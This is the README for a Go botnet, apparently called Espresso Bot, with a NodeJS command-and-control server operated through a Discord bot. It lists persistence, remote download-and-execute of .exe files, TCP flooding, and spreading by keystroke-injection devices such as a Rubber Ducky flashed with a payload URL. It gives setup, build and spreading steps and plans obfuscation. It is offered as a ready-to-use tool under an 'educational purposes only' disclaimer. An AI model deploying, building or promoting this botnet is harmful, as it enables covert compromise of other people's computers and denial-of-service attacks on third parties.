Espresso Bot

HTTP/HTTPS based Golang botnet

Information

Espresso is a simple POC loader/bot inteded to be used for red team operations at controlled pentetsing enviroments. It features a centralized command & control server, session based API encryption and uses a Discord bot as the admin interface. It uses Rubber ducky or any keyboard emulation capable microcontroller as a spreading agent.

C&C Features

• Writen in NodeJS
• Cross platform
• Discord bot control (no login system required)
• Used ID whitelist
• IP blacklist
• Using ORM (compatible with any SQL database)
• User-Agent filtering

Bot Features

• Written in Go
• Persistence
• AES256 traffic and file encryption
• System information (OS, arch, hostname)
• Download and run .exe remotely
• TCP flooding
• USB Rubber Ducky or Arduino spreading

How to use

Server

• Install NodeJS
• Unzip the project and cd into it
• Install NodeJS dependencies with yarn install or npm install
• Edit .env with your info
• Edit the User Whitelist with your discord id's
• Edit the Ip Blacklist with your ip's
• Start server with yarn start or npm start or a process manager (PM2)
• Copy invite from terminal and invite the bot into your server

Client

• Install Golang
• Go to src dir
• Clone this repo git clone https://github.com/TasosY2K/espresso-bot.git
• cd to client/ and install Go registry with go get -u golang.org/x/sys/windows/registry
• Edit the variables in espresso.go at the main function with your info
• Build the client by running build.bat or build.sh
• Your coffee is ready espresso.exe

Spreading

• Install Arduino IDE or Rubber Ducky flasher
• Edit client/DownloadAndRun.txt or client/DownloadAndRun.ino with your payload url
• Flash

Screenshots

Todo

• Better spreading agent
• Add obfuscation
• Fix loader
• Add kill switch
• Add melt function

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.